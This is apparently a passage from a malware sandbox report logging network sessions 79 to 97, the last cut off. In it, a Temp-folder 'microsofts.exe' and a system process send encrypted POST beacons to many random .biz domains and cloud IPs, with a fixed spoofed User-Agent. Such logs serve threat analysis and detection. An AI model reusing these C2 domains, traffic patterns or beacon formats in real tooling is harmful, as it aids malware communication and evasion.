Oct 20, 2024 18:42:24.111646891 CEST	350	OUT	POST /llqwfg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:24.111716986 CEST	826	OUT	Data Raw: f6 14 4d 96 d2 06 21 5e 2e 03 00 00 60 74 5a 7f ec 53 bd 52 89 2d 1c 25 d8 cb 68 05 65 ed dc 03 c4 8b a0 de 24 00 18 94 32 14 1f a6 42 63 26 9d 71 4c c7 e5 8e 7c e4 e3 26 5f f9 7d ba 92 8f b6 cc ae 1d 26 bb b2 81 7c c0 bd 62 22 f4 21 d1 27 b2 aa Data Ascii: M!^.`tZSR-%he$2Bc&qL\|&_}&\|b"!'8!x3dmu\xTd GUPcD!Q(eO"LJ\|h/su9$^EmEm+(\(=+YSX_\|o(~^s"%1{EdC?t`'p/7Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49915	34.211.97.45	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:24.117562056 CEST	353	OUT	POST /ktqlpojqyvkm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:24.117650986 CEST	778	OUT	Data Raw: 0b 4b c4 5d 74 bd a6 53 fe 02 00 00 1d 3e eb 8b 89 59 ca 45 71 5a b9 cb af 82 be 5a 2a ae 30 67 c1 c1 4e dc 54 c6 48 59 9d 09 92 7f 5d ef 0c c6 7c 8e 2d 4f f1 46 89 35 63 88 01 8a 37 ab 18 15 f9 f1 ec 92 2d 25 93 0f 79 42 fd 7f d3 af 2e 01 80 41 Data Ascii: K]tS>YEqZZ0gNTHY]\|-OF5c7-%yB.A&}WBGX=jVl1y@uw[1{RT"RD"Yd\|Hbq<nAJa_`N3it^yjFZ+7'Qq!"SN5OpLTS%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49921	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:25.111047029 CEST	356	OUT	POST /lmmwofqbgibg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:25.111078978 CEST	826	OUT	Data Raw: 4b 12 15 b9 b9 25 0c 81 2e 03 00 00 2a a5 7c 62 12 71 14 ea b8 31 2c 30 c4 04 84 dd 65 e9 13 0d 56 d5 85 31 34 7c 18 6e 3b 2a 18 4b 10 a0 45 9f ca 00 36 77 f5 b4 02 0b 2a d8 a2 fe 8a fd c5 d5 33 29 4e 6f db c2 60 08 a6 df 3e 2d 11 c9 e1 4b ba d7 Data Ascii: K%.\|bq1,0eV14\|n;KE6w*3)No`>-K'Cwq7sA7M!n0%l97=t<>b`\|OgqKOPpQ3G.ZzR]j^is0\"Ar](;t9DF8_-GB<+h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49922	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:25.302773952 CEST	350	OUT	POST /unbrcr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:25.302807093 CEST	778	OUT	Data Raw: f7 3a 5d e2 7a 6b d6 8f fe 02 00 00 40 7f 32 39 d7 de d6 0c 95 55 fe 07 8a ca 86 3c 71 f9 dc 32 d7 54 70 fa 44 29 1f 8e 24 c1 e7 55 da e9 08 63 2d 98 4d 72 43 3b 08 93 a5 1d 73 ab 88 38 fb e1 ba 9b a8 62 fe 4d 27 f3 5a 17 b8 1e 72 5d 08 58 02 98 Data Ascii: :]zk@29U<q2TpD)$Uc-MrC;s8bM'Zr]XQz ]]3h_6~\|t*OMZ\}pS9_<w6cHL(;#Ue66;[u3}w} ydWkbP_`.A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49927	35.164.78.200	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:26.165186882 CEST	355	OUT	POST /dfhareuduqlkw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:26.165203094 CEST	826	OUT	Data Raw: cc 51 c5 53 19 e3 e4 af 2e 03 00 00 5d ba 05 b6 c7 39 b9 a4 d2 45 43 9f 3a d3 7c a6 e6 32 62 8e 8f 17 d8 f0 92 61 ef c2 cb 30 33 d0 b0 07 63 07 a9 42 19 36 7e 10 05 01 6a 95 1d a1 49 e5 3e 2c 63 06 13 8d a7 79 1c b7 d2 12 cb ca 52 7e 6a f2 b2 a3 Data Ascii: QS.]9EC:\|2ba03cB6~jI>,cyR~j1V_lPUeq{_:bi[Qb7\8x^{;+c,Nrx<xxo8sr,9hDsio~^k> O[dM),bATJ+Ae,J\:x]j\|UPf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49929	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:26.447299004 CEST	350	OUT	POST /dfkoxo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:26.447299004 CEST	778	OUT	Data Raw: b6 00 43 c8 3a 0f 7f 15 fe 02 00 00 7a 94 46 e8 03 0c 38 13 bf e1 bd e4 84 25 e4 5d ce b9 2f 55 49 07 51 de 2f 71 cc e3 28 63 f9 fe 8d 70 5a 6a d0 aa 8a 25 8d 05 75 ad 8c 9f aa bc 88 60 64 0e b0 be b4 5d 66 3d 51 b1 e0 d2 5f af 46 7d fa 28 a7 c3 Data Ascii: C:zF8%]/UIQ/q(cpZj%u`d]f=Q_F}(nz_ 4You(c@aQ}6FVivZbzSSY]~$6O@O=yM:g w>X*2E6'}Z qa7v]9aD_\]_6][

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49934	35.164.78.200	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:27.182028055 CEST	345	OUT	POST /mag HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:27.182063103 CEST	826	OUT	Data Raw: 32 20 84 02 fa 68 0c 8b 2e 03 00 00 84 4c e8 82 32 7b c9 9b 01 91 c2 67 9a 8f 33 c7 5e 25 42 1d 30 01 8b 41 9a 11 e8 6f f2 7e 28 a4 5e 28 36 f4 30 29 eb d3 b6 33 92 41 0e 65 f7 84 69 2e 69 ff 6f e3 94 8f be 95 73 a5 0f 9a 3f ea 6a fc fb eb c0 21 Data Ascii: 2 h.L2{g3^%B0Ao~(^(60)3Aei.ios?j!M4<7phAj@O4SGt#l7_\|Q)K27*ddYURbqd,wrNrpK=x=%Z'W_aWO?jBW(o`.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49936	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:27.668659925 CEST	358	OUT	POST /vwiainnwhhxhmrl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:27.668680906 CEST	778	OUT	Data Raw: d6 b5 5e 42 ea 29 36 5d fe 02 00 00 43 1d ae fd 55 3c 92 1d 3f 70 a1 c1 33 57 bf 58 83 6c 94 c2 ea ff 2e f6 38 f6 7d d4 0c 01 ac c6 3a 8c 43 a7 95 84 4d 5a c2 8c b8 3d 3c 99 a0 72 dc bd f6 9e 34 fe b4 c8 ad 55 6d 14 b5 90 c4 82 a5 18 db cf 7b 6b Data Ascii: ^B)6]CU<?p3WXl.8}:CMZ=<r4Um{kF#$hStsv?T0[D-]8vzbFKLHIdMO!@&~Nz3Nh1yKv7pcmk;q6ZfKJNL)"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49940	3.94.10.34	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:28.208437920 CEST	350	OUT	POST /qxusu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:28.208472967 CEST	826	OUT	Data Raw: f4 bf 69 bd 7e f2 9d f8 2e 03 00 00 91 8e ad 89 de ed 4e f9 94 03 43 d2 3a 02 d3 17 c5 48 19 ee 0f 3b 18 04 0c 77 e3 b0 89 3f 13 9a 39 d4 6c c1 f0 f8 8b c1 34 0c e2 b0 06 0d 67 35 42 b0 7f 75 6a e3 08 ae ba b9 9e 68 6f 15 3c 6b 9d 4a 3e d8 bb fc Data Ascii: i~.NC:H;w?9l4g5Bujho<kJ>1MJ$H<{&b1BrEO\|t`r~H7tRUt@%Xkykz0NVcaHp29d:]](jX"D2w2h IZVh4$FjJW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49944	3.94.10.34	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:29.148860931 CEST	356	OUT	POST /jnsspbhiayv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:29.148885965 CEST	826	OUT	Data Raw: 3a 74 1a 1a 76 bc 8d 1d 2e 03 00 00 8a f2 89 86 bb ab 82 9f 78 c6 6c b2 39 90 8f 82 03 37 4d 3c f2 14 59 67 8e 4b 16 08 3c 25 41 d9 c3 64 e8 8f 62 5e dc 4b 94 0c c8 30 b3 b6 59 30 fd 32 d3 ff 56 7e 10 e5 93 b7 2d c3 4d b0 49 f0 0f cf e2 77 f4 9e Data Ascii: :tv.xl97M<YgK<%Adb^K0Y02V~-MIwD_t?6:{vwQUYtiX,G~,w'wPPiT5y)Sa' _9p:&*Yc<=A\X\he$+nqKJv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49945	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:29.268930912 CEST	356	OUT	POST /mwjcsncppbbsr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:29.271924973 CEST	778	OUT	Data Raw: 2c 55 c0 fc 41 31 15 81 fe 02 00 00 1a ae 46 ab 05 d2 d3 19 6e b0 34 19 1c f1 59 8b 05 a9 43 43 9c 0b fb 6d 6c d7 1b 63 43 4a 93 6b b5 b2 a8 33 cb e0 fc e3 b8 d1 94 82 3c 2d 92 81 76 ae bc 38 5e 91 c3 4a d4 12 d5 53 ec 3e 29 63 1b f1 4f f2 c6 0e Data Ascii: ,UA1Fn4YCCmlcCJk3<-v8^JS>)cOwU*Y.&Y1Sd<HORrLiUYa[F4].[D3%[~??M6xF?5V[Q#<U^V3HH/&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49952	165.160.13.20	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:30.597018957 CEST	349	OUT	POST /olxjktqd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:30.597018957 CEST	826	OUT	Data Raw: 67 46 77 e8 36 5e dc ef 2e 03 00 00 44 64 b0 d7 c0 a9 7d f0 92 fa 57 fc d3 1b 1e 24 46 9e 82 f3 65 e2 57 77 fc 0a 04 12 66 ff de d7 fb 61 64 c9 c8 8f b8 b7 3b 45 d6 81 de 82 ba 58 9d 69 8b 53 f2 cf 2a 05 91 2f 90 3b 84 a4 b3 05 24 56 b0 b8 9a f9 Data Ascii: gFw6^.Dd}W$FeWwfad;EXiS*/;$V[G#qBS;Me^B]~:ohe\c$oA>JU!Qnny-ZVc)Pgs9?Ug.,H-1C^e0JvWl>7zWGY<c2!&/~t6
Oct 20, 2024 18:42:31.523525953 CEST	170	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 16:42:31 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49954	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:31.132653952 CEST	355	OUT	POST /tcqjjounlnobfq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:31.132685900 CEST	778	OUT	Data Raw: 79 0b 11 be ab 75 15 2a fe 02 00 00 f9 7b 66 3b c4 c6 27 1a 40 30 92 40 16 af be 43 79 d4 9e 3d c3 19 4b d0 9e 19 4d 74 06 db 83 48 9d d1 5d a2 4f ca 2a f1 31 ad f8 3b 25 9e 75 6f 26 d2 6c 5f c0 98 ce 2c f8 2d 52 f1 68 4f 1c 11 73 b9 fa e4 c0 1e Data Ascii: yu{f;'@0@Cy=KMtH]O1;%uo&l_,-RhOsnj&?<P;)US/&ExXNM7XBq1e&Zum 6-"?bxzJUQELA3lxvYw\q^p*RUPLJ-\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49957	165.160.13.20	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:31.581407070 CEST	342	OUT	POST /m HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:31.581432104 CEST	826	OUT	Data Raw: b0 f2 9c bb ba 98 9c 27 2e 03 00 00 77 5f 9b 30 f1 01 06 02 47 f5 11 36 84 99 b0 aa 6a f3 de e0 74 30 81 cc fe c6 fb 61 3b c9 f3 f8 d5 e3 3a 85 48 fd e9 9a ab 38 db 0f 15 39 67 06 86 4b e1 3b ca 74 eb 54 db 31 fa d2 56 9b 9c c8 a6 da db ed 68 fe Data Ascii: '.w_0G6jt0a;:H89gK;tT1VhU]G\|*QQ`JtJ8f+ $U0qEy+J1Uy'":zWSAPR1m-?d\|^%MVAd:]nzqBW\ >F1Pk
Oct 20, 2024 18:42:32.606940985 CEST	170	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 16:42:32 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49960	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:32.328960896 CEST	344	OUT	POST /lix HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:32.328960896 CEST	778	OUT	Data Raw: d2 28 b7 85 1c 05 2c 42 fe 02 00 00 9e 28 f8 07 d2 28 c9 70 e3 4f 97 a7 08 70 98 30 b6 10 a6 10 f0 55 a8 e3 21 79 78 eb e0 52 9a 2b 89 89 27 6d 9f b8 eb 88 f4 95 d1 e8 c7 52 07 65 e2 4e f0 48 dd da 44 f9 10 f6 c1 70 49 d0 74 9d 45 60 7b 4e 74 db Data Ascii: (,B((pOp0U!yxR+'mReNHDpItE`{Nt6=droA$Is\|&SLgkMSo4pngeMxr(tNnBiiC}MADm!qf_[m#$YOa]/}kL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49963	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:32.652921915 CEST	353	OUT	POST /pfqnedtf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:32.652976036 CEST	826	OUT	Data Raw: c7 de 25 a0 6b c0 53 d7 2e 03 00 00 6c 15 88 c8 35 54 c3 2c 8f e6 ce e7 b6 c1 e9 04 8c ea 3d 92 59 27 b3 3c ef e5 44 48 89 70 b4 21 f1 9f a0 fe 9e 58 89 fd 35 62 7e 69 43 0f 4b 2d 49 3c ac 02 3a 93 1f af 1e 7d 74 01 5d 40 be 70 17 6a 36 31 ad 86 Data Ascii: %kS.l5T,=Y'<DHp!X5b~iCK-I<:}t]@pj610hKX'J]LPL'p~[_F/N\J7Od>sH"uTECDU\OC!3BvzN@Muo*4eT;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49966	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:33.988209963 CEST	349	OUT	POST /xobu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:33.988229036 CEST	826	OUT	Data Raw: 23 ba c0 3d 4c fa 11 56 2e 03 00 00 de eb 0a d6 e3 6b f3 45 f4 0d 84 82 55 12 6a 55 4e d0 bb 52 47 10 93 8c c9 84 d9 91 b5 c0 58 3d 86 36 12 cf 97 2b a9 a8 8b f9 96 ee bd ca 34 d2 50 03 9f 0a 7a de e8 02 99 cc 51 bd fb 30 de 2b 9b 4d 83 43 5c 92 Data Ascii: #=LV.kEUjUNRGX=6+4PzQ0+MC\}]J5sm-jwo<JPLjv0\|E~d^d5(sqT\uX@ >{D\j#QAv;WHyGlG`I^wb>*RfMQ5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49970	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:34.346446037 CEST	356	OUT	POST /ccaldaoawyay HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:34.346471071 CEST	778	OUT	Data Raw: 1d ae 03 dc f7 23 d3 1c fe 02 00 00 9a 43 b6 a2 97 d7 c0 33 3a 76 12 a6 a2 de d0 a1 4b 72 9c 46 71 34 18 05 26 da 2e 67 db 54 c6 5b b8 30 5c 5c d0 d4 90 7d 83 46 01 06 75 fd 58 8b 14 11 12 6f 62 08 50 f7 95 ed 66 51 4c fe 85 e3 fb 6c 57 c7 09 7d Data Ascii: #C3:vKrFq4&.gT[0\\}FuXobPfQLlW}@ntd7V`~i9Bt_mTvCI!cF\|A,i')DkAn8jU$k0[n^~.Dv}adluNd37ouQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49972	208.100.26.245	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:35.108237982 CEST	346	OUT	POST /qsp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:35.108266115 CEST	826	OUT	Data Raw: 22 17 dd 87 cb ac b2 92 2e 03 00 00 cd 7d 72 47 67 10 79 54 30 91 35 81 d5 50 e1 cc 1d 70 24 ac 9b 2a 9f 3b 0f 1f 2a 5b 69 9d c0 49 c3 c5 3e 97 e2 f8 28 ec 31 c0 9e fa 47 f1 c4 fe 6e 0d f0 1f 1b 6b b0 78 b5 fe 94 d4 76 59 42 bd fb 3b d1 f3 92 dc Data Ascii: ".}rGgyT05Pp$;[iI>(1GnkxvYB;}7(gayI15u'z6:b$w5!.\|5H5RFe{SnWy@qc4,<\|Il^ij{rJIY s~
Oct 20, 2024 18:42:35.980192900 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:35 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49974	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:35.348906994 CEST	354	OUT	POST /ccrsdbhein HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
